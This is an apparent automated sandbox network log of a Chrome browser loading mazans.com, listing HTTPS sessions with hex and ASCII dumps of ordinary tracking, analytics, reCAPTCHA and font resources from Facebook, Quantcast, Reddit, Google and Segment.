                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC14884INData Raw: 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 7d 2c 22 2a 22 29 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 20 45 72 72 6f 72 3a 20 50 69 78 65 6c 20 63 6f 64 65 20 69 73 20 6e 6f 74 20 69 6e 73 74 61 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 20 6f 6e 20 74 68 69 73 20 70 61 67 65 22 29 3b 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: led correctly on this page"},"*");"error"in console&&console.error("Facebook Pixel Error: Pixel code is not installed correctly on this page");return!1}return!0}())return;f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbe
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1500INData Raw: 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 67 61 74 69 6e 67 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 67 61 74 69 6e 67 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 29 7d 29 28 29 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 6c 6f 63 61 74 69 6f 6e 2c 68 69 73 74 6f 72 79 29 3b 0a 66 62 71 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 37 33 31 39 35 30 39 36 33 36 30 36 36 33 37 22 2c 20 7b 5f 5f 66 62 45 76 65 6e 74 73 50 6c 75 67 69 6e 3a 20 31 2c 20 70 6c 75 67 69 6e 3a 20 66 75 6e 63 74 69 6f 6e 28 66 62 71 2c 20 69 6e 73 74 61 6e 63 65 2c 20 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ("fbevents.plugins.gating",e.exports);f.ensureModuleRegistered("fbevents.plugins.gating",function(){return e.exports})})()})(window,document,location,history);fbq.registerPlugin("731950963606637", {__fbEventsPlugin: 1, plugin: function(fbq, instance, c


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          76192.168.2.174989118.66.102.154436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC538OUTGET /rules-p-de_F6qVUp9bug.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: rules.quantcount.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 9860
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 13 Oct 2022 23:55:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-methods: GET
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:18 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                          ETag: "edccd7502a75ade3b500ac4cde53d109"
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 985c0b2ec44bdebc7f24f26d1e427d30.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-P2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: Z4OC7P42JBxOlZjrDvWJCB8zkgmC-zJTeFs-3S9Yt8r_vdyiuPP0Jw==
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC9860INData Raw: 2f 2a 0a 20 51 75 61 6e 74 63 61 73 74 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 74 61 67 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 32 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 0a 2a 2f 0a 27 75 73 65 20 73 74 72 69 63 74 27 3b 28 66 75 6e 63 74 69 6f 6e 28 61 2c 72 2c 70 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 65 3d 70 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 65 2e 68 72 65 66 3d 64 3b 72 65 74 75 72 6e 20 65 7d 2c 75 3d 5b 2f 5e 68 74 74 70 5b 73 5d 3f 3a 5c 2f 5c 2f 28 28 61 64 73 65 72 76 69 63 65 2e 67 6f 6f 67 6c 65 2e 2a 29 7c 28 5b 5e 5c 2f 5d 2a 66 6c 73 5c 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 5c 2e 6e 65 74 29 29 5c 2f 2e 2a 7e 6f 72 65 66 3d 28 3f 3c 75 72 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /* Quantcast measurement tag Copyright (c) 2008-2022, Quantcast Corp.*/'use strict';(function(a,r,p){var t=function(d){var e=p.createElement("a");e.href=d;return e},u=[/^http[s]?:\/\/((adservice.google.*)|([^\/]*fls\.doubleclick\.net))\/.*~oref=(?<url


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          77192.168.2.1749886151.101.65.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC653OUTGET /rp.gif?ts=1731515353679&id=t2_i1au5p4&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=59612d52-27d8-4d62-91ae-7a523b33ca67&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: alb.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                          Retry-After: 0
                                                                                                                                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.3, "failure_fraction": 0.3}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          78192.168.2.1749894142.250.184.2284436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC937OUTGET /recaptcha/api2/anchor?ar=1&k=6Lc3fVoiAAAAAPwG5oAIHRlqs43SHIxX8Zi1CpOs&co=aHR0cHM6Ly9tYXphbnMuY29tOjQ0Mw..&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=ef4fwz83bs9w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-rb41hsXHgPIHjByccC-wXw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC217INData Raw: 31 64 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1d18<!DOCTYPE HTML><html dir="ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><style type="text/css">/* cyrillic-ext */@font-fac
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 41 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 42 41 2c 20 55 2b 30 32 42 44 2d 30 32 43 35 2c 20 55 2b 30 32 43 37 2d 30 32 43 43 2c 20 55 2b 30 32 43 45 2d 30 32 44 37 2c 20 55 2b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: atin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto'; font-style: normal; font-weight:
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: BBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face { f
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1378INData Raw: 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 32 2d 30 31 30 33 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: : url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfCxc4EsA.woff2) format('woff2'); unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC349INData Raw: 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 72 62 34 31 68 73 58 48 67 50 49 48 6a 42 79 63 63 43 2d 77 58 77 22 3e 0a 20 20 20 20 20 20 72 65 63 61 70 74 63 68 61 2e 61 6e 63 68 6f 72 2e 45 72 72 6f 72 4d 61 69 6e 2e 69 6e 69 74 28 22 5b 5c 78 32 32 61 69 6e 70 75 74 5c 78 32 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 31 2c 31 2c 31 5d 2c 5c 78 32 32 49 6e 76 61 6c 69 64 20 64 6f 6d 61 69 6e 20 66 6f 72 20 73 69 74 65 20 6b 65 79 5c 78 32 32 2c 36 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5c 78 32 32 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6e 74 6c 2f 65 6e 2f 70 6f 6c 69 63 69 65 73 2f 70 72 69 76 61 63 79 2f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: cript type="text/javascript" nonce="rb41hsXHgPIHjByccC-wXw"> recaptcha.anchor.ErrorMain.init("[\x22ainput\x22,null,null,null,null,null,[1,1,1],\x22Invalid domain for site key\x22,6,null,null,null,[\x22https://www.google.com/intl/en/policies/privacy/
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          79192.168.2.174989599.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC575OUTGET /analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1559
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Tue, 17 Sep 2024 01:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 16 Sep 2024 16:03:18 GMT
